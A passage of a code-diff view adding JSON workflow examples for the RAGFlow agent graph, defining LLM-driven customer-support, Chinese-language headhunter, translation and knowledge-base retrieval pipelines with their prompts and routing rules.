"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:0"],
|
||||
"upstream": ["begin", "generate:0", "generate:casual", "generate:answer", "generate:complain", "generate:ask_contact", "message:get_contact"]
|
||||
},
|
||||
"categorize:0": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"product_related": {
|
||||
"description": "The question is about the product usage, appearance and how it works.",
|
||||
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?\nException: Can't connect to ES cluster\nHow to build the RAGFlow image from scratch",
|
||||
"to": "retrieval:0"
|
||||
},
|
||||
"casual": {
|
||||
"description": "The question is not about the product usage, appearance and how it works. Just casual chat.",
|
||||
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
|
||||
"to": "generate:casual"
|
||||
},
|
||||
"complain": {
|
||||
"description": "Complain even curse about the product or service you provide. But the comment is not specific enough.",
|
||||
"examples": "How bad is it.\nIt's really sucks.\nDamn, for God's sake, can it be more steady?\nShit, I just can't use this shit.\nI can't stand it anymore.",
|
||||
"to": "generate:complain"
|
||||
},
|
||||
"answer": {
|
||||
"description": "This answer provide a specific contact information, like e-mail, phone number, wechat number, line number, twitter, discord, etc,.",
|
||||
"examples": "My phone number is 203921\nkevinhu.hk@gmail.com\nThis is my discord number: johndowson_29384",
|
||||
"to": "message:get_contact"
|
||||
}
|
||||
},
|
||||
"message_history_window_size": 8
|
||||
}
|
||||
},
|
||||
"downstream": ["retrieval:0", "generate:casual", "generate:complain", "message:get_contact"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"generate:casual": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are a customer support. But the customer wants to have a casual chat with you instead of consulting about the product. Be nice, funny, enthusiasm and concern.",
|
||||
"temperature": 0.9,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"generate:complain": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are a customer support. the Customers complain even curse about the products but not specific enough. You need to ask him/her what's the specific problem with the product. Be nice, patient and concern to soothe your customers’ emotions at first place.",
|
||||
"temperature": 0.9,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"]
|
||||
}
|
||||
},
|
||||
"downstream": ["relevant:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"relevant:0": {
|
||||
"obj": {
|
||||
"component_name": "Relevant",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"temperature": 0.02,
|
||||
"yes": "generate:answer",
|
||||
"no": "generate:ask_contact"
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:answer", "generate:ask_contact"],
|
||||
"upstream": ["retrieval:0"]
|
||||
},
|
||||
"generate:answer": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
|
||||
"temperature": 0.02
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"generate:ask_contact": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are a customer support. But you can't answer to customers' question. You need to request their contact like E-mail, phone number, Wechat number, LINE number, twitter, discord, etc,. Product experts will contact them later. Please do not ask the same question twice.",
|
||||
"temperature": 0.9,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"message:get_contact": {
|
||||
"obj":{
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"Okay, I've already write this down. What else I can do for you?",
|
||||
"Get it. What else I can do for you?",
|
||||
"Thanks for your trust! Our expert will contact ASAP. So, anything else I can do for you?",
|
||||
"Thanks! So, anything else I can do for you?"
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"path": [],
|
||||
"reference": [],
|
||||
"answer": []
|
||||
}
|
||||
210
graph/test/dsl_examples/headhunter_zh.json
Normal file
210
graph/test/dsl_examples/headhunter_zh.json
Normal file
@ -0,0 +1,210 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj": {
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "您好!我是AGI方向的猎头,了解到您是这方面的大佬,然后冒昧的就联系到您。这边有个机会想和您分享,RAGFlow正在招聘您这个岗位的资深的工程师不知道您那边是不是感兴趣?"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:0"],
|
||||
"upstream": ["begin", "message:reject"]
|
||||
},
|
||||
"categorize:0": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"about_job": {
|
||||
"description": "该问题关于职位本身或公司的信息。",
|
||||
"examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
|
||||
"to": "retrieval:0"
|
||||
},
|
||||
"casual": {
|
||||
"description": "该问题不关于职位本身或公司的信息,属于闲聊。",
|
||||
"examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
|
||||
"to": "generate:casual"
|
||||
},
|
||||
"interested": {
|
||||
"description": "该回答表示他对于该职位感兴趣。",
|
||||
"examples": "嗯\n说吧\n说说看\n还好吧\n是的\n哦\nyes\n具体说说",
|
||||
"to": "message:introduction"
|
||||
},
|
||||
"answer": {
|
||||
"description": "该回答表示他对于该职位不感兴趣,或感觉受到骚扰。",
|
||||
"examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n我已经不干这个了\n我不是这个方向的",
|
||||
"to": "message:reject"
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"downstream": [
|
||||
"message:introduction",
|
||||
"generate:casual",
|
||||
"message:reject",
|
||||
"retrieval:0"
|
||||
],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"message:introduction": {
|
||||
"obj": {
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"我简单介绍以下:\nRAGFlow 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。https://github.com/infiniflow/ragflow\n您那边还有什么要了解的?"
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"answer:1": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:1"],
|
||||
"upstream": [
|
||||
"message:introduction",
|
||||
"generate:aboutJob",
|
||||
"generate:casual",
|
||||
"generate:get_wechat",
|
||||
"generate:nowechat"
|
||||
]
|
||||
},
|
||||
"categorize:1": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"about_job": {
|
||||
"description": "该问题关于职位本身或公司的信息。",
|
||||
"examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
|
||||
"to": "retrieval:0"
|
||||
},
|
||||
"casual": {
|
||||
"description": "该问题不关于职位本身或公司的信息,属于闲聊。",
|
||||
"examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
|
||||
"to": "generate:casual"
|
||||
},
|
||||
"wechat": {
|
||||
"description": "该回答表示他愿意加微信,或者已经报了微信号。",
|
||||
"examples": "嗯\n可以\n是的\n哦\nyes\n15002333453\nwindblow_2231",
|
||||
"to": "generate:get_wechat"
|
||||
},
|
||||
"giveup": {
|
||||
"description": "该回答表示他不愿意加微信。",
|
||||
"examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n不方便\n不知道还要加我微信",
|
||||
"to": "generate:nowechat"
|
||||
}
|
||||
},
|
||||
"message_history_window_size": 8
|
||||
}
|
||||
},
|
||||
"downstream": [
|
||||
"retrieval:0",
|
||||
"generate:casual",
|
||||
"generate:get_wechat",
|
||||
"generate:nowechat"
|
||||
],
|
||||
"upstream": ["answer:1"]
|
||||
},
|
||||
"generate:casual": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "你是AGI方向的猎头,现在候选人的聊了和职位无关的话题,请耐心的回应候选人,并将话题往该AGI的职位上带,最好能要到候选人微信号以便后面保持联系。",
|
||||
"temperature": 0.9,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["categorize:0", "categorize:1"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"]
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:aboutJob"],
|
||||
"upstream": ["categorize:0", "categorize:1"]
|
||||
},
|
||||
"generate:aboutJob": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "你是AGI方向的猎头,候选人问了有关职位或公司的问题,你根据以下职位信息回答。如果职位信息中不包含候选人的问题就回答不清楚、不知道、有待确认等。回答完后引导候选人加微信号,如:\n - 方便加一下微信吗,我把JD发您看看?\n - 微信号多少,我把详细职位JD发您?\n 职位信息如下:\n {input}\n 职位信息如上。",
|
||||
"temperature": 0.02
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["retrieval:0"]
|
||||
},
|
||||
"generate:get_wechat": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "你是AGI方向的猎头,候选人表示不反感加微信,如果对方已经报了微信号,表示感谢和信任并表示马上会加上;如果没有,则问对方微信号多少。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
|
||||
"temperature": 0.1,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["categorize:1"]
|
||||
},
|
||||
"generate:nowechat": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "你是AGI方向的猎头,当你提出加微信时对方表示拒绝。你需要耐心礼貌的回应候选人,表示对于保护隐私信息给予理解,也可以询问他对该职位的看法和顾虑。并在恰当的时机再次询问微信联系方式。也可以鼓励候选人主动与你取得联系。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
|
||||
"temperature": 0.1,
|
||||
"message_history_window_size": 12,
|
||||
"cite": false
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:1"],
|
||||
"upstream": ["categorize:1"]
|
||||
},
|
||||
"message:reject": {
|
||||
"obj": {
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"好的,祝您生活愉快,工作顺利。",
|
||||
"哦,好的,感谢您宝贵的时间!"
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"path": [],
|
||||
"reference": [],
|
||||
"answer": []
|
||||
}
|
||||
39
graph/test/dsl_examples/intergreper.json
Normal file
39
graph/test/dsl_examples/intergreper.json
Normal file
@ -0,0 +1,39 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["begin", "generate:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an professional interpreter.\n- Role: an professional interpreter.\n- Input format: content need to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
|
||||
"temperature": 0.5
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["answer:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
39
graph/test/dsl_examples/interpreter.json
Normal file
39
graph/test/dsl_examples/interpreter.json
Normal file
@ -0,0 +1,39 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there! Please enter the text you want to translate in format like: 'text you want to translate' => target language. For an example: 您好! => English"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["begin", "generate:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an professional interpreter.\n- Role: an professional interpreter.\n- Input format: content need to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
|
||||
"temperature": 0.5
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["answer:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
54
graph/test/dsl_examples/retrieval_and_generate.json
Normal file
54
graph/test/dsl_examples/retrieval_and_generate.json
Normal file
@ -0,0 +1,54 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["retrieval:0"],
|
||||
"upstream": ["begin", "generate:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"]
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["retrieval:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
@ -0,0 +1,88 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["categorize:0"],
|
||||
"upstream": ["begin", "generate:0", "switch:0"]
|
||||
},
|
||||
"categorize:0": {
|
||||
"obj": {
|
||||
"component_name": "Categorize",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"category_description": {
|
||||
"product_related": {
|
||||
"description": "The question is about the product usage, appearance and how it works.",
|
||||
"examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
|
||||
"to": "retrieval:0"
|
||||
},
|
||||
"others": {
|
||||
"description": "The question is not about the product usage, appearance and how it works.",
|
||||
"examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
|
||||
"to": "message:0"
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"downstream": ["retrieval:0", "message:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"message:0": {
|
||||
"obj":{
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"Sorry, I don't know. I'm an AI bot."
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["categorize:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"]
|
||||
}
|
||||
},
|
||||
"downstream": ["generate:0"],
|
||||
"upstream": ["switch:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["retrieval:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"path": [],
|
||||
"answer": []
|
||||
}
|
||||
82
graph/test/dsl_examples/retrieval_relevant_and_generate.json
Normal file
82
graph/test/dsl_examples/retrieval_relevant_and_generate.json
Normal file
@ -0,0 +1,82 @@
|
||||
{
|
||||
"components": {
|
||||
"begin": {
|
||||
"obj":{
|
||||
"component_name": "Begin",
|
||||
"params": {
|
||||
"prologue": "Hi there!"
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": []
|
||||
},
|
||||
"answer:0": {
|
||||
"obj": {
|
||||
"component_name": "Answer",
|
||||
"params": {}
|
||||
},
|
||||
"downstream": ["retrieval:0"],
|
||||
"upstream": ["begin", "generate:0", "switch:0"]
|
||||
},
|
||||
"retrieval:0": {
|
||||
"obj": {
|
||||
"component_name": "Retrieval",
|
||||
"params": {
|
||||
"similarity_threshold": 0.2,
|
||||
"keywords_similarity_weight": 0.3,
|
||||
"top_n": 6,
|
||||
"top_k": 1024,
|
||||
"rerank_id": "BAAI/bge-reranker-v2-m3",
|
||||
"kb_ids": ["869a236818b811ef91dffa163e197198"],
|
||||
"empty_response": "Sorry, knowledge base has noting related information."
|
||||
}
|
||||
},
|
||||
"downstream": ["relevant:0"],
|
||||
"upstream": ["answer:0"]
|
||||
},
|
||||
"relevant:0": {
|
||||
"obj": {
|
||||
"component_name": "Relevant",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"temperature": 0.02,
|
||||
"yes": "generate:0",
|
||||
"no": "message:0"
|
||||
}
|
||||
},
|
||||
"downstream": ["message:0", "generate:0"],
|
||||
"upstream": ["retrieval:0"]
|
||||
},
|
||||
"generate:0": {
|
||||
"obj": {
|
||||
"component_name": "Generate",
|
||||
"params": {
|
||||
"llm_id": "deepseek-chat",
|
||||
"prompt": "You are an intelligent assistant. Please answer the question based on content of knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as following:\n {input}\n The above is the content of knowledge base.",
|
||||
"temperature": 0.2
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
},
|
||||
"message:0": {
|
||||
"obj":{
|
||||
"component_name": "Message",
|
||||
"params": {
|
||||
"messages": [
|
||||
"Sorry, I don't know. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
|
||||
"I'm an AI bot and not quite sure about this question. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
|
||||
"Can't find answer in my knowledge base. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?"
|
||||
]
|
||||
}
|
||||
},
|
||||
"downstream": ["answer:0"],
|
||||
"upstream": ["relevant:0"]
|
||||
}
|
||||
},
|
||||
"history": [],
|
||||
"path": [],
|
||||
"messages": [],
|
||||
"reference": {},
|
||||
"answer": []
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user